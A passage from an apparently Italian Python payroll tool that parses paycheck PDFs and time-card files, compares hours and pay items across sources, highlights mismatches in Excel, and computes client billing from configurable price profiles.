"Z01160",
"Z00246",
"Z00255",
"Z01138",
"000279",
"001008",
"ZP0160",
"ZP0162",
"ZPS000",
"000282",
"003955",
"Z05031",
"Z05075",
"ZP0001",
"ZP0003",
"ZP0030",
"003951",
"002099",
"002101",
"003802",
"002100",
"F09080",
"F09100",
"F09130",
"F09081",
"Z50022",
"Z50023",
"Z51000",
"Z51010",
"Z05004",
"Z05041",
"Z05065",
"Z05060",
"ZP0029",
"000085",
"000229",
"000086",
"ZP8134",
"ZP8138",
"ZP8130",
"003450",
"003411",
"000283",
"000031",
"ZP0140",
"ZP0144",
"F02701",
"quota t.f.r.",
"quota t.f.r. a fondi"
],
"merging_columns": {
"Ferie/fest. pagate": [
"Z01100",
"Z01160",
"Z01138",
"Z00255",
"Z51010",
"Z00246",
"Z51000",
"000031"
],
"T.F.R.": [
"quota t.f.r.",
"quota t.f.r. a fondi",
"ZP8134",
"003450",
"fondo t.f.r. al 31/12"
],
"Cessione 1/5": [
"002101",
"002100",
"003951",
"002099"
],
"Assegni Familiari": [
"ZP0160",
"ZP0162",
"ZP0140",
"ZP0144",
]
}
}
self.config = None
self.__load_conversion_table()
""" PRIVATE METHODS """
def __load_conversion_table(self):
"""
set the PaycheckController configuration. with this configuration the program knows which
fields to extract from paychecks
"""
if os.path.exists(self.conversion_table_path):
with open(self.conversion_table_path, "r") as f:
new_config = json.load(f)
self.config = new_config
return
else:
self.config = copy.deepcopy(self.default_configuration)
""" PUBLIC METHODS """
def create_config_from_csv(self, csv_path):
"""
csv must have at least two columns 'Codice voce' and 'Descrizione voce'
"""
new_config = copy.deepcopy(self.config)
with open(csv_path, 'rt') as f:
df = pd.read_csv(f, sep=";")
columns = {}
for index, row_ in df.iterrows():
row = dict(row_)
# parse out nan values
parsed_row = {}
for val in row:
if not pd.isnull(row[val]):
parsed_row[val] = row[val]
if parsed_row['Codice voce'] not in new_config["col_codes"]:
columns[parsed_row['Codice voce']] = parsed_row
columns[parsed_row['Codice voce']]['col_value'] = -1
# adding keys
columns["quota t.f.r."] = {"Descrizione voce": "Quota T.F.R.", "col_value": -1}
columns["quota t.f.r. a fondi"] = {"Descrizione voce": "Quota T.F.R. a Fondi", "col_value": -1}
# setting new_config with parsed data and dumping it
new_config["col_codes"] = columns
with open(self.conversion_table_path, "w") as f:
f.write(json.dumps(new_config, indent=4, ensure_ascii=True))
self.__load_conversion_table()
print(f"* * conversion_table.json created from this file >> {csv_path}")
def validate_data(self):
if not self.paychecks_to_check:
raise Exception("Error: paycheck to check not specified")
if not os.path.exists(self.paychecks_to_check):
raise Exception(f"Error: cannot find {self.paychecks_to_check}")
if not os.path.exists(self.badges_path):
raise Exception(f"Error: cannot find {self.badges_path}")
if not os.path.isdir(self.badges_path):
raise Exception(f"Error: {self.badges_path} is not a folder")
if len(os.listdir(self.badges_path)) < 1:
raise Exception(f"Error: {self.badges_path} is empty!")
return True
def set_badges_path(self, path):
"""setter for path to badges folder. it should contain .pdf files from every badge (splitted from BusinessCat)"""
self.badges_path = path
def set_paychecks_to_check_path(self, path):
"""setter for path to paychecks to check. it should be a .pdf file"""
self.paychecks_to_check = path
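# Typical workflow sketch (paths are hypothetical):
#   pc = PaycheckController()
#   pc.set_paychecks_to_check_path("lul_controllo.pdf")
#   pc.set_badges_path("CARTELLINI")
#   pc.validate_data()
#   pc.paycheck_verification()
#   pc.badges_verification()
#   pc.compare_badges_to_paychecks()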
# main functions
def paycheck_verification(self, create_Excel=True):
PDF_file = self.paychecks_to_check
total_content = {}
col_codes = self.config['col_codes']
col_to_extract = self.config['col_to_extract']
merging_columns = self.config['merging_columns']
# if there are no columns to extract set in the configuration, raise exception
if not col_codes:
raise Exception("No columns specified for extraction in config file")
inputpdf = fitz.open(PDF_file)
# for each page
for i in range(inputpdf.pageCount):
page = inputpdf.loadPage(i)
blocks = page.getText("blocks")
blocks.sort(key=lambda block: block[1]) # sort vertically ascending
####### find name in page
name = None
for index, b in enumerate(blocks):
for elem in b:
elem = str(elem)
if ('cognome' in elem and 'nome' in elem) or ('COGNOME' in elem and 'NOME' in elem):
name_array = (blocks[index+1][4]).split('\n')
# if the block only has two lines, a "cessato" (terminated) marker may have shifted the name to the next block
if len(name_array) == 2:
for check_ in name_array:
if "cessat" in check_.lower():
name_array = (blocks[index+2][4]).split('\n')
break
# check if there's a name in the array which was found in the block
for value in name_array:
valid = True
for char in value:
if char.isdigit():
valid = False
break
if valid and value:
if value != None and not value.isspace() and value[0].isalpha():
name = value
break
if name:
name = name.upper()
# add name to total_content
if name not in total_content:
total_content[name] = {}
####### get page content
for index, b in enumerate(blocks):
content = b[4].split('\n')
content = [string for string in content if (string != "" and not string.startswith(" "))]
# find ordinary and overtime hours in paycheck
h_check = [h.lower().strip() for h in content]
if "ore ordinarie" and "ore straordinarie" in h_check:
w_hours = [x for x in blocks[index+2][4].split('\n') if "," in x]
if len(w_hours) == 1:
w_hours.append("0")
try:
total_content[name]['Ore ordinarie'] = float(w_hours[0].replace(",","."))
total_content[name]['Ore straordinarie'] = float(w_hours[1].replace(",","."))
except IndexError:
pass
# parsing content
for i, elem in enumerate(content):
# parse netto del mese
if "NETTOsDELsMESE" in elem:
netto = blocks[index+1][-3]
# some paychecks are laid out slightly differently; this check works around that
if str(netto).startswith("Perm"):
netto = blocks[index+2][-3]
netto = netto.replace("€", "").strip().replace(",",".")
netto = netto.replace(".", "", (netto.count('.') - 1))
try:
netto = float(netto)
total_content[name]["Netto del Mese"] = netto
except:
pass
elem = (elem.replace("*", "")).strip()
for paycheck_code in col_codes:
if (paycheck_code.lower() == elem.split(" ")[0].lower()) \
or (len(paycheck_code.split(" ")) > 1) and elem.lower().startswith(paycheck_code.lower()):
# check if value is to be extracted
if paycheck_code in col_to_extract:
# check if it needs to be merged
elem_colname = None
for colname in merging_columns:
for subname in merging_columns[colname]:
if subname == paycheck_code:
elem_colname = colname
if not elem_colname:
elem_colname = col_codes[paycheck_code]['Descrizione voce']
# get row value
val = content[col_codes[paycheck_code]['col_value']].replace(",", ".")
val = val.replace(".", "", (val.count('.') - 1))
try:
val = float(val)
except:
pass
# report data in the proper column
if elem_colname not in total_content[name]:
total_content[name][elem_colname] = val
else:
total_content[name][elem_colname] += val
if create_Excel:
sheet_name = "Verifica Buste Paga"
self.create_Excel(total_content, sheet_name)
print(f"File {self.verify_filename} generato con successo, {sheet_name} aggiunto al suo interno")
def badges_verification(self, create_Excel=True):
def parse_decimal_time(decimal_time):
# if the trailing zero is missing, append it (e.g. "3" -> "30" minutes)
if len(decimal_time) == 1:
decimal_time = decimal_time + "0"
hour_min = 60
result = (100*int(decimal_time))/hour_min
return str(int(result))
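# worked example: parse_decimal_time("3") pads to "30" minutes and returns "50" (i.e. 0.50 hours);
# parse_decimal_time("45") returns "75" (0.75 hours)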
total_content = {}
#for each badge
for file in os.listdir(self.badges_path):
path_to_badge = "/".join((self.badges_path, file))
full_name = None
last_block = []
inputpdf = fitz.open(path_to_badge)
####### find name
page = inputpdf.loadPage(0)
blocks = page.getText("blocks")
blocks.sort(key=lambda block: block[1]) # sort vertically ascending
for index, b in enumerate(blocks):
if "cognome e nome" in b[4].split('\n')[0].lower():
full_name = blocks[index+1][-3].split('\n')[0]
full_name = " ".join(full_name.split())
break
###### find values
if full_name:
total_content[full_name] = {"Ore ordinarie": 0.0, "Ore straordinarie": 0.0}
for index, b in enumerate(blocks):
##### check if block is a day
if len(b[4].split()[0][:-1]) <= 2 and b[4].split()[0][-1].isalpha() and b[4].split()[0][:-1].isdigit():
day = b[4].split()
day, day_values_ = day[0], day[1:]
# iterate over the day's values and check they were read correctly by the library. POSSIBLE BUG IF CODES ARE LONGER THAN 3 CHARACTERS
day_values = []
for i, v_ in enumerate(day_values_):
if len(v_) > 6: # longer than times formatted as ###,##
day_values.append(v_[0:2])
day_values.append(v_[2:])
i += 1
else:
day_values.append(v_)
i += 1
day_values_ = day_values
# check if data is valid
if len(day_values_) != 0 and day[1:][0].isdigit():
if len(day_values_) % 2 != 0:
raise Exception(f"Expected even pairs, got uneven pairs for worker {full_name} on day {day}")
day_values_ = list(zip(day_values_[0::2], day_values_[1::2]))
day_values = []
# parse tuples in day values_
for i_, tupla in enumerate(day_values_):
# remove errors and start/end of workshift
if len((tupla[0])) > 4 or (len(tupla[0]) == 4 and "," not in tupla[0]):
continue
if len(day_values) < 2:
day_values.append(tupla)
# if the first value is not an hour count, skip the day
if day_values:
if len(day_values[0][0]) == 3:
pass
else:
# parse decimal time values to number values
value_to_add = day_values[0][0].replace(",", ".").split(".")
if len(value_to_add) == 2:
if value_to_add[1] != "00" and value_to_add[1] != "0":
value_to_add[1] = parse_decimal_time(value_to_add[1])
value_to_add = float(".".join(value_to_add))
else:
value_to_add = float(day_values[0][0])
# if there is more than one pair of values in the day
if len(day_values) > 1:
# if hours are overtime skip them
if day_values[1][0] == "306" or day_values[1][0] == "006":
pass
else:
total_content[full_name]['Ore ordinarie'] += value_to_add
# otherwise assume they are ordinary hours
else:
total_content[full_name]['Ore ordinarie'] += value_to_add
##### check if block is last and parse its data
if b[4].split()[0].isdigit() and not b[4].split()[0][-1].isalpha() and len(b[4].split()[0])<=3:
last_block_values = b[4].split()
# parse values
for val in last_block_values:
is_number = True
for letter in val:
if letter.isalpha() and letter != ",":
is_number = False
# append conditionally
if is_number:
if "," in val:
last_block.append(float(val.replace(",",".")))
else:
last_block.append(int(val))
else:
if type(last_block[-1]) == int or type(last_block[-1]) == float:
last_block.append(val)
else:
last_block[-1] = last_block[-1] + " " + val
# check if data is valid
if len(last_block)%3 != 0:
raise Exception(f"Expected triplets on badge footer values for worker {full_name}")
##### last fixes
total_content[full_name]["Ore ordinarie"] = total_content[full_name]["Ore ordinarie"]
last_block = list(zip(last_block[0::3], last_block[1::3], last_block[2::3]))
for pair in last_block:
#parse pair[2] time value to number value
pair_value = str(pair[2]).replace(",", ".").split(".")
if len(pair_value) == 2:
if pair_value[1] != "00" and pair_value[1] != "0":
pair_value[1] = parse_decimal_time(pair_value[1])
pair_value = float(".".join(pair_value))
if pair[0] == 306 or pair[0] == 6:
total_content[full_name]["Ore straordinarie"] += pair_value
total_content[full_name][str(pair[0]) + " " + str(pair[1])] = pair_value
if create_Excel:
sheet_name = "Verifica Cartellini"
self.create_Excel(total_content, sheet_name)
print(f"File {self.verify_filename} generato con successo, {sheet_name} aggiunto al suo interno")
def create_Excel(self, content, sheet_name, transposed=True):
df = pd.DataFrame.from_dict(content)
if transposed:
df = df.T
# sort alphabetically rows and columns
df = df.sort_index()
df = df.reindex(sorted(df.columns), axis=1)
open_mode = "a" if os.path.exists(self.verify_filename) else "w"
with pd.ExcelWriter(self.verify_filename, mode=open_mode) as writer:
df.to_excel(writer, sheet_name=sheet_name)
def compare_badges_to_paychecks(self, keep_refer_values=True):
CHECK_SUFFIX = " PAYCHECK"
badges_df = pd.read_excel(self.verify_filename, sheet_name="Verifica Cartellini", index_col=0)
paychecks_df = pd.read_excel(self.verify_filename, sheet_name="Verifica Buste Paga", index_col=0)
# set indexes name
badges_df.index.name = "LAVORATORI"
paychecks_df.index.name = "LAVORATORI"
# fix wrong indexes in badges
badges_df = badges_df.rename(index={
'GUZMAN URENA ALEXANDER DE JE': 'GUZMAN URENA ALEXANDER DE JESUS',
'NUTU LOREDANA ADRIAN': 'NUTU LOREDANA ADRIANA'
})
# uniform indexes
badges_df.index = badges_df.index.str.upper()
paychecks_df.index = paychecks_df.index.str.upper()
# create df with all data
common_columns = set(badges_df.columns.values).intersection(set(paychecks_df.columns.values))
common_df = paychecks_df[list(common_columns)].copy()
renaming = {key: key + CHECK_SUFFIX for key in common_df.columns.values}
common_df = common_df.rename(columns=renaming)
data_df = badges_df.merge(common_df, left_index=True, right_index=True)
self.create_Excel(data_df, sheet_name="temp", transposed=False)
destination_workbook = openpyxl.load_workbook(self.verify_filename)
ws = destination_workbook["temp"]
# find column of columns to highlight
headings = [row for row in ws.iter_rows()][0]
headings = [x.value for x in headings]
matching_ = dict.fromkeys(common_columns, 0)
matching = {}
for col in matching_:
matching[col] = 0
matching[col + CHECK_SUFFIX] = 0
for col in headings:
if col in matching.keys():
matching[col] = headings.index(col)
for index, row in enumerate(ws.iter_rows()):
# headers excluded
if index != 0:
row_values = [x.value for x in row]
worker_check = {}
worker_errors = []
# gather worker data
for val in matching:
worker_check[val] = row_values[matching[val]]
# find worker errors
for data in worker_check:
check_val = data + CHECK_SUFFIX
if CHECK_SUFFIX not in data and check_val in worker_check:
if worker_check[data] == 0 and worker_check[check_val] == None:
continue
else:
if (worker_check[data]>0 and worker_check[check_val] == None) or (worker_check[data] - worker_check[check_val] != 0):
worker_errors.append(data)
worker_errors.append(check_val)
if worker_errors:
# parse errors to cells
highlight_row = index + 1
for _i, error in enumerate(worker_errors):
highlight_column = get_column_letter(matching[error]+1)
worker_errors[_i] = str(highlight_column) + str(highlight_row)
for c in worker_errors:
cell = ws[c]
cell.fill = PatternFill(start_color='FFEE1111', end_color='FFEE1111', fill_type='solid')
# drop refer columns conditionally
if not keep_refer_values:
col_to_remove = []
for val in matching:
if CHECK_SUFFIX in val:
col_to_remove.append(matching[val]+1)
for val in sorted(col_to_remove, reverse=True):
ws.delete_cols(val)
#replace old verification with edited one
destination_workbook.remove(destination_workbook["Verifica Cartellini"])
ws.title = "Verifica Cartellini"
destination_workbook.save(self.verify_filename)
print(f">> BADGES COMPARED WITH PAYCHECKS SUCCESSFULLY")
"""
# works poorly: it highlights the right cells but not all of them
styled_df = data_df.style
for column in common_columns:
col_to_check = column + " PAYCHECK"
styled_df = styled_df.apply(lambda i_: ["background-color:red" if data_df.iloc[i_][col_to_check] - data_df.iloc[i_][column] != 0 else "" for i_, row in enumerate(data_df.iterrows())], subset=[column], axis=0)
styled_df.to_excel("test.xlsx", engine="openpyxl", index=True)
"""
def compare_paychecks_to_drive(self, df_bytestream, sheet, keep_refer_values=True, leave_blanks=False):
CHECK_SUFFIX = " DRIVE"
drive_df = get_comparison_df(df_bytestream, sheet)
drive_df = drive_df[drive_df.index.notnull()]
paychecks_df = pd.read_excel(self.verify_filename, sheet_name="Verifica Buste Paga", index_col=0)
# set indexes name
paychecks_df.index.name = "LAVORATORI"
drive_df.index.name = "LAVORATORI"
# uniform indexes
drive_df.index = drive_df.index.str.upper()
paychecks_df.index = paychecks_df.index.str.upper()
# check divergences on dataframes
problems = {"uncommon_indexes": [],"different_lenght": False, "error_string": ""}
uncommon_indexes = list(set(drive_df.index.values) - set(paychecks_df.index.values))
same_index_length = True if len(drive_df.index) - len(paychecks_df.index) == 0 else False
# if drive_df contains workers who are missing from the paychecks (not hired)
if (uncommon_indexes and not same_index_length):
problems["uncommon_indexes"] = uncommon_indexes
problems["error"] = "Non assunti sul Drive"
# if there are typos in drive_df
elif (uncommon_indexes and same_index_length):
problems["uncommon_indexes"] = uncommon_indexes
problems["error"] = "Errori di scrittura sul Drive"
# merge dataframes
common_columns = list(set(drive_df.columns.values).intersection(set(paychecks_df.columns.values)))
common_df = drive_df[common_columns]
common_df = common_df.rename(columns={key: key + CHECK_SUFFIX for key in common_df.columns.values})
#data_df = pd.merge_ordered(left=common_df.reset_index(), right=paychecks_df.reset_index(), left_on="LAVORATORI", right_on="LAVORATORI", left_by="LAVORATORI").set_index("LAVORATORI").sort_index()
data_df = paychecks_df.merge(common_df, left_index=True, right_index=True).sort_index()
self.create_Excel(data_df, sheet_name="temp", transposed=False)
destination_workbook = openpyxl.load_workbook(self.verify_filename)
ws = destination_workbook["temp"]
# create empty rows for uncommon_indexes (shouldn't be used)
if leave_blanks:
index_checkup = {k: v for k, v in enumerate(common_df.index.values)}
# add blank lines based on index_checkup
rows = list(enumerate(ws.iter_rows()))
added_rows = 0
for row in rows[::-1]:
i_ = row[0]+1
w_name = row[1][0].value
try:
if index_checkup[i_-added_rows] != w_name:
ws.insert_rows(i_+added_rows)
added_rows += 1
except:
pass
# find column of columns to highlight
headings = [row for row in ws.iter_rows()][0]
headings = [x.value for x in headings]
matching_ = dict.fromkeys(common_columns, 0)
matching = {}
for col in matching_:
matching[col] = 0
matching[col + CHECK_SUFFIX] = 0
for col in headings:
if col in matching.keys():
matching[col] = headings.index(col)
for index, row in enumerate(ws.iter_rows()):
# headers excluded
if index != 0:
row_values = [x.value for x in row]
worker_check = {}
worker_errors = []
# gather worker data from his row
for key in matching:
val = row_values[matching[key]]
if isinstance(val, str) and "€" in val:
val = val.replace("€", "").replace("-", "").replace(",", ".").strip()
worker_check[key] = float(val) if val else 0
elif not val:
worker_check[key] = 0
elif isinstance(val, float) or isinstance(val, int):
worker_check[key] = val
# find worker errors
for data in worker_check:
if CHECK_SUFFIX not in data:
try:
if worker_check[data] - worker_check[data + CHECK_SUFFIX] != 0:
worker_errors.append(data)
worker_errors.append(data + CHECK_SUFFIX)
except Exception as e:
print(e)
if worker_errors:
# parse errors to cells
highlight_row = index + 1
for _i, error in enumerate(worker_errors):
highlight_column = get_column_letter(matching[error] + 1)
worker_errors[_i] = str(highlight_column) + str(highlight_row)
for c in worker_errors:
cell = ws[c]
cell.fill = PatternFill(start_color='FFEE1111', end_color='FFEE1111', fill_type='solid')
# drop refer columns conditionally
if not keep_refer_values:
col_to_remove = []
for val in matching:
if CHECK_SUFFIX in val:
col_to_remove.append(matching[val] + 1)
for val in sorted(col_to_remove, reverse=True):
ws.delete_cols(val)
# replace old verification with edited one
destination_workbook.remove(destination_workbook["Verifica Buste Paga"])
ws.title = "Verifica Buste Paga"
destination_workbook.save(self.verify_filename)
print(f">> PAYCHECKS COMPARED WITH DRIVE {sheet} VALUES SUCCESSFULLY")
return problems
class BillingManager():
""" classe non utilzzata """
def __init__(self, bill_name="Fattura"):
self.bill_name = f"{bill_name}.xlsx"
self.badges_path = None # badges_path
self.regex_day_pattern = r"([1-9]|[12]\d|3[01])[LMGVSF]"  # day number followed by a weekday letter
self.name_cell = "B5" # cell of the badge sheet where the worker's name is found
self.pairing_schema = {
"COD QTA": ["COD", "QTA"],
"ENT USC": ["ENT", "USC"],
"GIOR PROG": ["GIOR", "PROG"]
}
self.untouchable_keys = ["id", "tag"]
self.total_content = None
# model configs
self.model_name = "Modello fatturazione.xlsx"
self.footer_color = "e6e6e6"
# config paths
self._clients_path = "../config_files/BusinessCat billing/clients.json"
self._billing_profiles_path = "../config_files/BusinessCat billing/billing_profiles.json"
self._jobs_path = "../config_files/BusinessCat billing/jobs.json"
# load data from config paths
self.__load_clients()
self.__load_billing_profiles()
self.__load_jobs()
# defaults
self.default_new_job = {
"id":"",
"name":"",
"billing_profile_id":""
}
self.default_new_client = {
"id":"",
"name":""
}
self.default_billing_profile = {
"id": "",
"name": "",
"pricelist": [
{
"tag": "OR",
"name": "ore_ordinarie",
"price": 0.0
},
{
"tag": "ST",
"name": "ore_straordinarie",
"price": 0.0
},
{
"tag": "MN",
"name": "ore_notturne",
"price": 0.0
},
{
"tag": "OF",
"name": "ore_festive",
"price": 0.0
},
{
"tag": "SF",
"name": "ore_straordinarie_festive",
"price": 0.0
},
{
"tag": "SN",
"name": "ore_straordinarie_notturne",
"price": 0.0
},
{
"tag": "FN",
"name": "ore_festive_notturne",
"price": 0.0
}
]
}
print(">> BillingManager Initialized")
""" PRIVATE METHODS """
def __get_engine(self):
"""get engine conditional based on extension of self.badges_path"""
if not self.badges_path:
raise Exception("badges_path missing!")
elif self.badges_path.rsplit(".")[-1] == "xlsx":
engine = "openpyxl"
elif self.badges_path.rsplit(".")[-1] == "xls":
engine = "xlrd"
else:
raise TypeError("self.badges_path is not an Excel!")
return engine
def __load_clients(self):
""" read and load current billing_profiles file """
# create empty file if not existing
if not os.path.exists(self._clients_path):
init_data = []
with open(self._clients_path, "w") as f:
f.write(json.dumps(init_data, indent=4, ensure_ascii=True))
print("** created new clients.json file")
with open(self._clients_path,"r") as f:
self.clients = json.load(f)
print("** clients caricati")
def __load_billing_profiles(self):
""" read and load current billing_profiles file """
# create empty file if not existing
if not os.path.exists(self._billing_profiles_path):
init_data = []
with open(self._billing_profiles_path, "w") as f:
f.write(json.dumps(init_data, indent=4, ensure_ascii=True))
print("** created new billing_profile.json file")
with open(self._billing_profiles_path,"r") as f:
self.billing_profiles = json.load(f)
print("** billing_profiles caricati")
def __load_jobs(self):
""" read and load current billing_profiles file """
# create empty file if not existing
if not os.path.exists(self._jobs_path):
init_data = []
with open(self._jobs_path, "w") as f:
f.write(json.dumps(init_data, indent=4, ensure_ascii=True))
print("** created new jobs.json file")
with open(self._jobs_path,"r") as f:
self.jobs = json.load(f)
self.jobs_namelist = sorted([job["name"] for job in self.jobs])
self.jobs_namelist.insert(0,"")
print("** jobs caricati")
def __load_Excel_badges(self):
"""Load excel data of badges file (must be .xls or .xlsx)"""
if not self.badges_path:
raise Exception("ERROR: No badges_path specified")
engine = self.__get_engine()
try:
if engine == "openpyxl":
xlsx_data = openpyxl.load_workbook(self.badges_path)
sheet_names = xlsx_data.sheetnames
elif engine == "xlrd":
xlsx_data = xlrd.open_workbook(self.badges_path, on_demand=True, logfile=open(os.devnull, 'w'))
sheet_names = xlsx_data.sheet_names()
else:
raise
return xlsx_data, sheet_names, engine
except Exception as e:
raise Exception(f"Cannot load_Excel_badges. Error: {e}")
def __manage_columns(self, df):
""" private method to fix original column names"""
fixed_columns = []
prev_fixed = False
for index, v in enumerate(df.columns.values):
if prev_fixed:
prev_fixed = False
continue
new_value = df.columns.values[index].split()
new_value = " ".join(new_value).strip()
if new_value.startswith("COD QTA"):
new_value = new_value.split()
if len(new_value[1]) > 3:
new_value[0] = new_value[0] + new_value[1][3:]
fixed_columns.append(new_value[0])
fixed_columns.append(new_value[1])
prev_fixed = True
else:
fixed_columns.append(new_value)
df.columns = fixed_columns
to_remove = []
for index, col in enumerate(df.columns.values):
if col.startswith("Unnamed"):
# if col not in fixed_columns:
to_remove.append(index)
return df.drop(df.columns[to_remove], axis=1)
def __get_badge_name(self, sheet_obj):
"""get owner's name out of sheet"""
engine = self.__get_engine()
try:
if engine == "openpyxl":
badge_name = (sheet_obj[self.name_cell]).value
elif engine == "xlrd":
badge_name = sheet_obj.cell_value(int(self.name_cell[1:]) - 1, int(openpyxl.utils.cell.column_index_from_string(self.name_cell[0])) - 1)
else:
raise
try:
badge_name = " ".join(badge_name.split())
except:
badge_name = None
return badge_name
except Exception as e:
raise Exception(f"Cannot get_badge_name. Error: {e}")
def __minutes_to_int(self, decimal_time):
""" decimal_time => (str) MM"""
# if the trailing zero is missing, append it (e.g. "3" -> "30" minutes)
if len(decimal_time) == 1:
decimal_time = decimal_time + "0"
hour_min = 60
result = (100 * int(decimal_time)) / hour_min
return str(int(result))
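# worked example: __minutes_to_int("45") returns "75", i.e. 45 minutes expressed as hundredths of an hour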
def __round_float(self, float_number, decimal_pos=2):
try:
float(float_number)
except:
raise TypeError("Cannot round: not a float number")
rounded = str(float_number).split(".")
rounded = float(rounded[0] + "." + rounded[1][:decimal_pos])
return rounded
def __smart_renamer(self, name):
old_name = name.split(" ")
new_name = ""
try:
for index, word in enumerate(old_name):
word = word.strip()
if word:
if index < len(old_name) - 1:
new_name += (word[0].upper() + word[1:].lower() + " ")
else:
new_name += (word[0].upper() + word[1:].lower())
except:
new_name = name[0].upper() + name[1:].lower()
return new_name
def __gp_column_renamer(self, name):
lookup_table = {
"Ore ORD": "OR",
"Ore STR": "ST",
"Ore NOTT": "MN",
"Ore FEST": "OF",
"Ore STR/FEST": "SF",
"Ore STR/NOTT": "SN",
"Ore FEST/NOTT": "FN"
}
new_name = None
if name in lookup_table:
new_name = lookup_table[name]
if not new_name:
new_name = name
return new_name
def __apply_billing_profile(self, hours_to_bill, billing_profile):
"""
steps: 1. adding time, 2. apply pattern, 3. apply pricing
"""
priced_hours = {}
# check integrity and get tag to focus
if hours_to_bill["OR"] and hours_to_bill["OF"]:
raise ValueError("ERROR: there are both ordinary and holiday hours on a single day")
else:
if hours_to_bill["OF"]:
tag = "OF"
elif hours_to_bill["OR"]:
tag = "OR"
else:
tag = None
# adding time (TIME IS ALWAYS ADDED IN BASE 100 eg. half an hour is not 0.30 but 0.5)
if tag:
if billing_profile["time_to_add"] and hours_to_bill[tag]:
if billing_profile["add_over_threshold"]:
if hours_to_bill[tag] >= billing_profile["threshold_hour"]:
hours_to_bill[tag] += billing_profile["time_to_add"]
else:
hours_to_bill[tag] += billing_profile["time_to_add"]
# apply pattern
if billing_profile["pattern"] and hours_to_bill[tag]:
new_amount = 0.0
start_val = copy.deepcopy(hours_to_bill[tag])
for i in range(len(billing_profile["pattern"])):
operation = billing_profile["pattern"][i]["perform"].strip()
amount = billing_profile["pattern"][i]["amount"]
if operation == "/":
start_val /= amount
elif operation =="-":
start_val -= amount
elif operation == "+":
start_val += amount
elif operation =="*":
start_val *= amount
else:
raise Exception("ERROR: invalid operator in pattern. operator must be one of + - * /")
if billing_profile["pattern"][i]["keep"]:
new_amount += start_val
hours_to_bill[tag] = new_amount
# apply pricing
try:
if billing_profile["pricelist"]:
for hour_type in hours_to_bill:
for p in billing_profile["pricelist"]:
if hour_type == p["tag"]:
priced_hours[hour_type] = hours_to_bill[hour_type]*p["price"]
priced_hours[hour_type] = self.__round_float(priced_hours[hour_type], decimal_pos=2)
else:
raise Exception("ERROR: No pricelist specified!")
except:
print("not found")
return priced_hours
def __get_gp_data(self, gp_xls):
wb = openpyxl.load_workbook(gp_xls)
ws = wb.worksheets[0]
# take the column names from the first row
columns = list(ws.iter_rows())[0]
columns = [c.value for c in columns]
columns = {k: v for k, v in enumerate(columns) if v}
total_w = []
w_obj = None
for row in list(ws.iter_rows())[1:-1]:
row_content = {k: v.value for k, v in enumerate(row) if k in columns}
if row_content[1] and str(row_content[1]).lower().startswith("somma"): continue
for x in row_content:
if row_content[x] == None:
row_content[x] = 0
if row_content[0]:
if w_obj:
total_w.append(w_obj)
w_obj = {}
for item in columns.items():
w_obj[item[1]] = row_content[item[0]]
else:
for index in row_content:
key = columns[index]
if key != "Nome":
w_obj[key] += row_content[index]
return total_w
""" PROTECTED METHODS """
# must be called once before billing/creating model
def _set_badges_path(self, badges_path):
if not os.path.exists(badges_path):
raise ValueError("ERROR: Cannot find badges path")
self.badges_path = badges_path
print("** badges_path caricato")
# must be called once before billing/creating model
def _set_billing_time(self, month, year):
self.billing_year = int(year)
self.billing_month = int(month)
self._holidays = holidays.IT(years=[self.billing_year, self.billing_year - 1])
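# Usage sketch (bm is a BillingManager instance; the path and period are hypothetical); both setters
# must be called before parsing badges or creating the model:
#   bm._set_badges_path("cartellini_febbraio.xlsx")
#   bm._set_billing_time(2, 2021)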
def _parse_badges(self, names=[]):
"""
read and fix the badges form, adjusting column names and preparing data to be read by other methods.
return a dict with every worker as key and, as value, a sub-dict containing each of their workdays
"""
xlsx_data, sheet_names, engine = self.__load_Excel_badges()
total_content = {}
not_valid_names = "ENTE: DIV.: GRP/FILIALE: REP:. Cognome Nome Codice"
not_valid_names = not_valid_names.split()
for sheetNo, sheet in enumerate(sheet_names):
sheet_data = xlsx_data[sheet] if engine == "openpyxl" else xlsx_data.get_sheet(sheetNo)
valid_name = False
incremented_by = 0
self.name_cell = "B5"
while not valid_name:
badge_name = self.__get_badge_name(sheet_data)
if badge_name and badge_name.split()[0] not in not_valid_names:
valid_name = True
else:
incremented_by += 1
self.name_cell = f"B{int(self.name_cell[-1]) + 1}"
if names:
if not badge_name in names:
continue
total_content[badge_name] = {}
# getting df, fixing columns, removing empty columns
df = pd.read_excel(xlsx_data, sheet_name=sheet, header=9 + incremented_by, index_col=0, engine=engine)
# set columns
df = self.__manage_columns(df)
# parse rows
for row_ in df.iterrows():
i = str(row_[0]).strip()
row = dict(row_[1])
try:
if re.search(self.regex_day_pattern, i):
row_dict = {}
# pairing values
already_parsed = []
for val in row:
paired = False
for key in self.pairing_schema:
number = ""
if val.split(".")[0] in self.pairing_schema[key]:
in_parsing = list(filter(lambda x: x != "", val.split(".")))
if len(in_parsing) > 1 and in_parsing[1]:
number = f".{in_parsing[1]}"
main_key = key + "." + number if number else key + number
if main_key not in already_parsed:
row_dict[main_key] = []
for v_ in self.pairing_schema[key]:
# find the correct refer_key
for _i in range(3):
refer_key = v_ + "."*_i + number
if refer_key in row.keys():
break
if not isinstance(row[refer_key], pd.Series):
row_dict[main_key].append(str(row[refer_key]).strip())
else:
check_val = ""
for index in list(row[refer_key].to_list()):
if not str(index).isspace():
check_val = str(index).strip()
row_dict[main_key].append(check_val)
already_parsed.append(main_key)
paired = True
if not paired:
row_dict[val] = row[val]
total_content[badge_name][i] = row_dict
except TypeError:
pass
self.total_content = total_content
return total_content
def _parse_days(self, total_content):
""" Pointing out what is the type of the hours worked by the worker that day """
to_return = {}
for worker in total_content:
to_return[worker] = {}
for day in total_content[worker]:
day_content = total_content[worker][day]
parsed_day = {
"OR": 0.0, # ordinarie
"ST": 0.0, # straordinarie
"MN": 0.0, # maggiorazione notturna
"OF": 0.0, # ordinario festivo
"SF": 0.0, # straordinario festivo
"SN": 0.0, # straordinario notturno
"FN": 0.0 # festivo notturno
}
# if there are no ordinary or overtime hours, record an empty day
if not any(day_content["GIOR PROG"]) and not any(day_content["GIOR PROG..1"]):
to_return[worker][day] = parsed_day
continue
# setting starting ordinary and overtime values
if day_content["GIOR PROG"][0]:
val = day_content["GIOR PROG"][0] if len(day_content["GIOR PROG"][0]) >= 4 else "0" + day_content["GIOR PROG"][0]
if "." in val:
val = val.split(".")[0] + "." + self.__minutes_to_int(val.split(".")[1])
parsed_day["OR"] += float(val)
if day_content["GIOR PROG..1"][0]:
val = day_content["GIOR PROG..1"][0] if len(day_content["GIOR PROG..1"][0]) >= 4 else "0" + day_content["GIOR PROG..1"][0]
if "." in val:
val = val.split(".")[0] + "." + self.__minutes_to_int(val.split(".")[1])
